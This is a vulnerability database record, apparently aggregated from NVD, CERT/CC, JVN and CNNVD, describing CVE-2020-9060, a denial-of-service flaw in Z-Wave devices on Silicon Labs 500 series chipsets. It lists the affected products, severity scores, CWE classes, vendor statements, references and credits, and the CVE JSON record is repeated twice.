                "vectorString": "CVSS:3.0/AV:A/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2020-9060",
                "trust": 1.0,
                "value": "MEDIUM"
              },
              {
                "author": "NVD",
                "id": "CVE-2020-9060",
                "trust": 0.8,
                "value": "Medium"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-202201-599",
                "trust": 0.6,
                "value": "MEDIUM"
              },
              {
                "author": "VULHUB",
                "id": "VHN-187185",
                "trust": 0.1,
                "value": "MEDIUM"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages. Various Silicon Labs Z-Wave chipsets do not support encryption, can be downgraded to not use weaker encryption, and are vulnerable to denial of service. Some of these vulnerabilities are inherent in Z-Wave protocol specifications.CVE-2020-10137 Unknown\nCVE-2020-9057 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic. S0 and S2 security can encrypt application data. \nCVE-2020-9058 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic.  S0 and S2 can encrypt application data. \nCVE-2020-9059 Affected\nVendor Statement:\nThis is a known weakness with S0 security. \nCVE-2020-9060 Affected\nVendor Statement:\nThis is a known weakness with S2 security. \nCVE-2020-9061 Affected\nVendor Statement:\nThis is a known weakness with S0 and S2 security.CVE-2020-10137 Unknown\nCVE-2020-9057 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic. S0 and S2 security can encrypt application data. \nCVE-2020-9058 Affected\nVendor Statement:\nThis is a known weakness with unencrypted traffic.  S0 and S2 can encrypt application data. \nCVE-2020-9059 Affected\nVendor Statement:\nThis is a known weakness with S0 security. \nCVE-2020-9060 Affected\nVendor Statement:\nThis is a known weakness with S2 security. \nCVE-2020-9061 Affected\nVendor Statement:\nThis is a known weakness with S0 and S2 security. Products from multiple vendors contain resource exhaustion vulnerabilities.Service operation interruption (DoS) It may be in a state",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          },
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          }
        ],
        "trust": 2.43
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "NVD",
            "id": "CVE-2020-9060",
            "trust": 4.2
          },
          {
            "db": "CERT/CC",
            "id": "VU#142629",
            "trust": 3.3
          },
          {
            "db": "JVN",
            "id": "JVNVU94598199",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599",
            "trust": 0.6
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185",
            "trust": 0.1
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "id": "VAR-202201-0274",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2024-08-14T14:18:11.282000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Top\u00a0Page iotech Aeotec",
            "trust": 0.8,
            "url": "https://www.fibaro.com/us/"
          },
          {
            "title": "Silicon Labs Z-Wave Chipsets Remediation of resource management error vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=178624"
          },
          {
            "title": "VFuzz-public",
            "trust": 0.1,
            "url": "https://github.com/CNK2100/VFuzz-public "
          }
        ],
        "sources": [
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-400",
            "trust": 1.1
          },
          {
            "problemtype": "CWE-346",
            "trust": 1.0
          },
          {
            "problemtype": "Resource exhaustion (CWE-400) [NVD evaluation ]",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.6,
            "url": "https://github.com/cnk2100/vfuzz-public"
          },
          {
            "trust": 2.5,
            "url": "https://kb.cert.org/vuls/id/142629"
          },
          {
            "trust": 2.5,
            "url": "https://ieeexplore.ieee.org/document/9663293"
          },
          {
            "trust": 1.7,
            "url": "https://www.kb.cert.org/vuls/id/142629"
          },
          {
            "trust": 1.7,
            "url": "https://doi.org/10.1109/access.2021.3138768"
          },
          {
            "trust": 1.4,
            "url": "https://nvd.nist.gov/vuln/detail/cve-2020-9060"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu94598199/index.html"
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "db": "VULMON",
            "id": "CVE-2020-9060"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-01-07T00:00:00",
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "date": "2022-01-10T00:00:00",
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "date": "2023-02-10T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "date": "2022-01-10T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "date": "2022-01-10T14:10:16.380000",
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2022-01-09T00:00:00",
            "db": "CERT/CC",
            "id": "VU#142629"
          },
          {
            "date": "2022-09-20T00:00:00",
            "db": "VULHUB",
            "id": "VHN-187185"
          },
          {
            "date": "2023-02-10T08:31:00",
            "db": "JVNDB",
            "id": "JVNDB-2021-017817"
          },
          {
            "date": "2022-01-19T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          },
          {
            "date": "2022-09-20T17:16:46.377000",
            "db": "NVD",
            "id": "CVE-2020-9060"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote or local",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Silicon Labs Z-Wave chipsets contain multiple vulnerabilities",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#142629"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "resource management error",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-202201-599"
          }
        ],
        "trust": 0.6
      }
    }

    CVE-2020-9060 (GCVE-0-2020-9060)

    Vulnerability from nvd – Published: 2022-01-07 04:30 – Updated: 2024-09-16 16:33
    VLAI
    Summary
    Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages.
    Severity
    No CVSS data available.
    CWE
    • CWE-346 - Origin Validation Error
    • CWE-400 - Uncontrolled Resource Consumption
    Assigner
    References
    URL Tags
    https://kb.cert.org/vuls/id/142629 third-party-advisoryx_refsource_CERT-VN
    https://ieeexplore.ieee.org/document/9663293 x_refsource_MISC
    https://github.com/CNK2100/VFuzz-public x_refsource_MISC
    https://doi.org/10.1109/ACCESS.2021.3138768 x_refsource_MISC
    https://www.kb.cert.org/vuls/id/142629 third-party-advisoryx_refsource_CERT-VN
    Date Public
    2021-12-27 00:00
    Credits
    Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T10:19:19.795Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "third-party-advisory",
                  "x_refsource_CERT-VN",
                  "x_transferred"
                ],
                "url": "https://kb.cert.org/vuls/id/142629"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://ieeexplore.ieee.org/document/9663293"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/CNK2100/VFuzz-public"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
              },
              {
                "name": "VU#142629",
                "tags": [
                  "third-party-advisory",
                  "x_refsource_CERT-VN",
                  "x_transferred"
                ],
                "url": "https://www.kb.cert.org/vuls/id/142629"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "ZEN25",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.03"
                }
              ]
            },
            {
              "product": "ZEN20",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.03"
                }
              ]
            },
            {
              "product": "ZST10",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.04"
                }
              ]
            },
            {
              "product": "FGWPB-111",
              "vendor": "Fibaro",
              "versions": [
                {
                  "status": "affected",
                  "version": "4.3"
                }
              ]
            },
            {
              "product": "500 series",
              "vendor": "Silicon Labs",
              "versions": [
                {
                  "status": "affected",
                  "version": "all"
                }
              ]
            },
            {
              "product": "ZW090-A",
              "vendor": "Aeon Labs",
              "versions": [
                {
                  "status": "affected",
                  "version": "3.95"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "value": "Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee"
            }
          ],
          "datePublic": "2021-12-27T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-346",
                  "description": "CWE-346 Origin Validation Error",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-400",
                  "description": "CWE-400 Uncontrolled Resource Consumption",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-01-07T23:06:11.000Z",
            "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
            "shortName": "certcc"
          },
          "references": [
            {
              "tags": [
                "third-party-advisory",
                "x_refsource_CERT-VN"
              ],
              "url": "https://kb.cert.org/vuls/id/142629"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://ieeexplore.ieee.org/document/9663293"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/CNK2100/VFuzz-public"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
            },
            {
              "name": "VU#142629",
              "tags": [
                "third-party-advisory",
                "x_refsource_CERT-VN"
              ],
              "url": "https://www.kb.cert.org/vuls/id/142629"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "x_generator": {
            "engine": "Vulnogram 0.0.9"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cert@cert.org",
              "DATE_PUBLIC": "2021-12-27T05:00:00.000Z",
              "ID": "CVE-2020-9060",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZEN25",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "5.03"
                              }
                            ]
                          }
                        },
                        {
                          "product_name": "ZEN20",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "5.03"
                              }
                            ]
                          }
                        },
                        {
                          "product_name": "ZST10",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "6.04"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "ZooZ"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "FGWPB-111",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "4.3"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Fibaro"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "500 series",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "all"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Silicon Labs"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZW090-A",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "3.95"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Aeon Labs"
                  }
                ]
              }
            },
            "credit": [
              {
                "lang": "eng",
                "value": "Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee"
              }
            ],
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages."
                }
              ]
            },
            "generator": {
              "engine": "Vulnogram 0.0.9"
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "CWE-346 Origin Validation Error"
                    }
                  ]
                },
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "CWE-400 Uncontrolled Resource Consumption"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://kb.cert.org/vuls/id/142629",
                  "refsource": "CERT-VN",
                  "url": "https://kb.cert.org/vuls/id/142629"
                },
                {
                  "name": "https://ieeexplore.ieee.org/document/9663293",
                  "refsource": "MISC",
                  "url": "https://ieeexplore.ieee.org/document/9663293"
                },
                {
                  "name": "https://github.com/CNK2100/VFuzz-public",
                  "refsource": "MISC",
                  "url": "https://github.com/CNK2100/VFuzz-public"
                },
                {
                  "name": "https://doi.org/10.1109/ACCESS.2021.3138768",
                  "refsource": "MISC",
                  "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
                },
                {
                  "name": "VU#142629",
                  "refsource": "CERT-VN",
                  "url": "https://www.kb.cert.org/vuls/id/142629"
                }
              ]
            },
            "source": {
              "discovery": "EXTERNAL"
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "assignerShortName": "certcc",
        "cveId": "CVE-2020-9060",
        "datePublished": "2022-01-07T04:30:28.026Z",
        "dateReserved": "2020-02-18T00:00:00.000Z",
        "dateUpdated": "2024-09-16T16:33:05.408Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }

    CVE-2020-9060 (GCVE-0-2020-9060)

    Vulnerability from cvelistv5 – Published: 2022-01-07 04:30 – Updated: 2024-09-16 16:33
    VLAI
    Summary
    Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages.
    Severity
    No CVSS data available.
    CWE
    • CWE-346 - Origin Validation Error
    • CWE-400 - Uncontrolled Resource Consumption
    Assigner
    References
    URL Tags
    https://kb.cert.org/vuls/id/142629 third-party-advisoryx_refsource_CERT-VN
    https://ieeexplore.ieee.org/document/9663293 x_refsource_MISC
    https://github.com/CNK2100/VFuzz-public x_refsource_MISC
    https://doi.org/10.1109/ACCESS.2021.3138768 x_refsource_MISC
    https://www.kb.cert.org/vuls/id/142629 third-party-advisoryx_refsource_CERT-VN
    Date Public
    2021-12-27 00:00
    Credits
    Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee
    Show details on NVD website

    {
      "containers": {
        "adp": [
          {
            "providerMetadata": {
              "dateUpdated": "2024-08-04T10:19:19.795Z",
              "orgId": "af854a3a-2127-422b-91ae-364da2661108",
              "shortName": "CVE"
            },
            "references": [
              {
                "tags": [
                  "third-party-advisory",
                  "x_refsource_CERT-VN",
                  "x_transferred"
                ],
                "url": "https://kb.cert.org/vuls/id/142629"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://ieeexplore.ieee.org/document/9663293"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://github.com/CNK2100/VFuzz-public"
              },
              {
                "tags": [
                  "x_refsource_MISC",
                  "x_transferred"
                ],
                "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
              },
              {
                "name": "VU#142629",
                "tags": [
                  "third-party-advisory",
                  "x_refsource_CERT-VN",
                  "x_transferred"
                ],
                "url": "https://www.kb.cert.org/vuls/id/142629"
              }
            ],
            "title": "CVE Program Container"
          }
        ],
        "cna": {
          "affected": [
            {
              "product": "ZEN25",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.03"
                }
              ]
            },
            {
              "product": "ZEN20",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "5.03"
                }
              ]
            },
            {
              "product": "ZST10",
              "vendor": "ZooZ",
              "versions": [
                {
                  "status": "affected",
                  "version": "6.04"
                }
              ]
            },
            {
              "product": "FGWPB-111",
              "vendor": "Fibaro",
              "versions": [
                {
                  "status": "affected",
                  "version": "4.3"
                }
              ]
            },
            {
              "product": "500 series",
              "vendor": "Silicon Labs",
              "versions": [
                {
                  "status": "affected",
                  "version": "all"
                }
              ]
            },
            {
              "product": "ZW090-A",
              "vendor": "Aeon Labs",
              "versions": [
                {
                  "status": "affected",
                  "version": "3.95"
                }
              ]
            }
          ],
          "credits": [
            {
              "lang": "en",
              "value": "Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee"
            }
          ],
          "datePublic": "2021-12-27T00:00:00.000Z",
          "descriptions": [
            {
              "lang": "en",
              "value": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages."
            }
          ],
          "problemTypes": [
            {
              "descriptions": [
                {
                  "cweId": "CWE-346",
                  "description": "CWE-346 Origin Validation Error",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            },
            {
              "descriptions": [
                {
                  "cweId": "CWE-400",
                  "description": "CWE-400 Uncontrolled Resource Consumption",
                  "lang": "en",
                  "type": "CWE"
                }
              ]
            }
          ],
          "providerMetadata": {
            "dateUpdated": "2022-01-07T23:06:11.000Z",
            "orgId": "37e5125f-f79b-445b-8fad-9564f167944b",
            "shortName": "certcc"
          },
          "references": [
            {
              "tags": [
                "third-party-advisory",
                "x_refsource_CERT-VN"
              ],
              "url": "https://kb.cert.org/vuls/id/142629"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://ieeexplore.ieee.org/document/9663293"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://github.com/CNK2100/VFuzz-public"
            },
            {
              "tags": [
                "x_refsource_MISC"
              ],
              "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
            },
            {
              "name": "VU#142629",
              "tags": [
                "third-party-advisory",
                "x_refsource_CERT-VN"
              ],
              "url": "https://www.kb.cert.org/vuls/id/142629"
            }
          ],
          "source": {
            "discovery": "EXTERNAL"
          },
          "x_generator": {
            "engine": "Vulnogram 0.0.9"
          },
          "x_legacyV4Record": {
            "CVE_data_meta": {
              "ASSIGNER": "cert@cert.org",
              "DATE_PUBLIC": "2021-12-27T05:00:00.000Z",
              "ID": "CVE-2020-9060",
              "STATE": "PUBLIC"
            },
            "affects": {
              "vendor": {
                "vendor_data": [
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZEN25",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "5.03"
                              }
                            ]
                          }
                        },
                        {
                          "product_name": "ZEN20",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "5.03"
                              }
                            ]
                          }
                        },
                        {
                          "product_name": "ZST10",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "6.04"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "ZooZ"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "FGWPB-111",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "4.3"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Fibaro"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "500 series",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "all"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Silicon Labs"
                  },
                  {
                    "product": {
                      "product_data": [
                        {
                          "product_name": "ZW090-A",
                          "version": {
                            "version_data": [
                              {
                                "version_affected": "=",
                                "version_value": "3.95"
                              }
                            ]
                          }
                        }
                      ]
                    },
                    "vendor_name": "Aeon Labs"
                  }
                ]
              }
            },
            "credit": [
              {
                "lang": "eng",
                "value": "Carlos Nkuba Kayembe, Kim Seulbae, Sven Dietrich, and Heejo Lee"
              }
            ],
            "data_format": "MITRE",
            "data_type": "CVE",
            "data_version": "4.0",
            "description": {
              "description_data": [
                {
                  "lang": "eng",
                  "value": "Z-Wave devices based on Silicon Labs 500 series chipsets using S2, including but likely not limited to the ZooZ ZST10 version 6.04, ZooZ ZEN20 version 5.03, ZooZ ZEN25 version 5.03, Aeon Labs ZW090-A version 3.95, and Fibaro FGWPB-111 version 4.3, are susceptible to denial of service and resource exhaustion via malformed SECURITY NONCE GET, SECURITY NONCE GET 2, NO OPERATION, or NIF REQUEST messages."
                }
              ]
            },
            "generator": {
              "engine": "Vulnogram 0.0.9"
            },
            "problemtype": {
              "problemtype_data": [
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "CWE-346 Origin Validation Error"
                    }
                  ]
                },
                {
                  "description": [
                    {
                      "lang": "eng",
                      "value": "CWE-400 Uncontrolled Resource Consumption"
                    }
                  ]
                }
              ]
            },
            "references": {
              "reference_data": [
                {
                  "name": "https://kb.cert.org/vuls/id/142629",
                  "refsource": "CERT-VN",
                  "url": "https://kb.cert.org/vuls/id/142629"
                },
                {
                  "name": "https://ieeexplore.ieee.org/document/9663293",
                  "refsource": "MISC",
                  "url": "https://ieeexplore.ieee.org/document/9663293"
                },
                {
                  "name": "https://github.com/CNK2100/VFuzz-public",
                  "refsource": "MISC",
                  "url": "https://github.com/CNK2100/VFuzz-public"
                },
                {
                  "name": "https://doi.org/10.1109/ACCESS.2021.3138768",
                  "refsource": "MISC",
                  "url": "https://doi.org/10.1109/ACCESS.2021.3138768"
                },
                {
                  "name": "VU#142629",
                  "refsource": "CERT-VN",
                  "url": "https://www.kb.cert.org/vuls/id/142629"
                }
              ]
            },
            "source": {
              "discovery": "EXTERNAL"
            }
          }
        }
      },
      "cveMetadata": {
        "assignerOrgId": "37e5125f-f79b-445b-8fad-9564f167944b",
        "assignerShortName": "certcc",
        "cveId": "CVE-2020-9060",
        "datePublished": "2022-01-07T04:30:28.026Z",
        "dateReserved": "2020-02-18T00:00:00.000Z",
        "dateUpdated": "2024-09-16T16:33:05.408Z",
        "state": "PUBLISHED"
      },
      "dataType": "CVE_RECORD",
      "dataVersion": "5.1"
    }